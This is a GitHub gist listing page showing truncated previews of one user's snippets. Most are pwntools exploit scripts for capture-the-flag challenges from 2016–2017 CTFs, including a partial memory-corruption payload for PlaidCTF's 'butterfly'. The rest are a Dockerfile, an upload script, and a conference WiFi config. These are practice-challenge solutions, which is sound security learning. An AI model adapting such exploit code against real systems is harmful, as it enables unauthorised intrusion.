Skip to content

Instantly share code, notes, and snippets.

View kokjo's full-sized avatar

Jonas Rudloff kokjo

100 followers · 7 following
View GitHub Profile
@kokjo
kokjo / doit_bigpicture.py
Created April 23, 2017 21:16
from pwn import *
def pwnit():
#h, w = (1024, 1024)
w, h = (1024, 1024)
#r.sendline(" "+"0"*4096 + "1 , 0 , A")
#r.recvuntil("> ")
@kokjo
kokjo / doit.py
Created April 10, 2017 12:21
Exploit for the challenge random from ASIS Quals CTF 2017
from pwn import *
context.arch = "amd64"
r = process("./Random_Generator_8c110de2ce4abb0f909bca289fb7b1a99fd18ef1")
#r = remote("69.90.132.40", 4000)
values = [0]
for i in range(1,8):
r.sendline(str(i))
@kokjo
kokjo / doit.py
Last active June 3, 2019 15:52
Solution to CRC problem from asis ctf 2017
from pwn import *
s = log.waitfor("Calculating CRC reverse lookup table")
reverse_crc = {crc.crc_32(p16(i)): p16(i) for i in range(2**16)}
s.success()
e = ELF("./crcme_8416479dcf3a74133080df4f454cd0f76ec9cc8d")
r = process("./crcme_8416479dcf3a74133080df4f454cd0f76ec9cc8d")
@MemLeak
@kokjo
kokjo / Dockerfile
Created April 2, 2017 08:04
FROM fedora
RUN dnf -y install glibc.i686 openssl-libs.i686 protobuf-devel.i686 protobuf-lite.i686 protobuf.i686
RUN dnf -y install git scons
RUN dnf -y install gcc
RUN dnf -y install glibc-devel.i686 libgcc.i686 libstdc++-devel.i686
RUN dnf -y install strace
RUN dnf -y install gcc-c++
RUN dnf -y install glibc-devel.x86_64 libgcc.x86_64 libstdc++-devel.x86_64
RUN git clone https://github.com/tsyrogit/zxcvbn-c.git
@kokjo
kokjo / doit_letsenchiffre.py
Last active April 6, 2017 05:54
Exploit for letsenchiffre from Nuit du Hack quals 2017
import letsenchiffre_pb2 as letsenchiffre
from pwn import *
def forge_request(password):
crtreq = letsenchiffre.CertificateRequest()
crtreq.Locality = "A"
crtreq.State = "A"
crtreq.City = "A"
crtreq.Company = "A"
crtreq.CommonName = "A"
@kokjo
kokjo / up
Created March 29, 2017 22:07
#!/bin/sh
WEBROOT="/path/to/web/root/on/server"
HOST="put.hostname.here"
scp "$1" "${USER}@${HOST}:${WEBROOT}$(basename "$1")"
echo "http://${HOST}/$(basename $1)"
sha256sum $1
@kokjo
kokjo / .net.conf
Created December 27, 2016 11:17
net tool configuration for 33c3
ccc:
ssid: 33C3
dns: dhcp
wpa: |
network={
ssid="33C3"
key_mgmt=WPA-EAP
eap=TTLS
identity="edward"
password="snowden"
@kokjo
kokjo / Bug.hs
Created December 21, 2016 15:11
module Bug where
import Control.Monad
import Control.Monad.State (gets)
import Control.Monad.Trans.Class (lift)
foo = lift lift gets
{-
$ ghc bug.hs
@kokjo
kokjo / demo.c
Created October 10, 2016 12:43
The old demo tool from pwntools.
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv) {
@kokjo
kokjo / doit_butterfly.py
Last active April 20, 2016 10:09
My solution to the butterfly challenge from Plaidctf 2016
from pwn import *
context(arch="amd64")
e = ELF("./butterfly_33e86bcc2f0a21d57970dc6907867bed")
r = remote("butterfly.pwning.xxx", 9999)
#r = process("./butterfly_33e86bcc2f0a21d57970dc6907867bed")
addr = 0x400860+3
num = (addr << 3) + 6
r.sendline(str(num).ljust(40)+p64(e.symbols["main"]))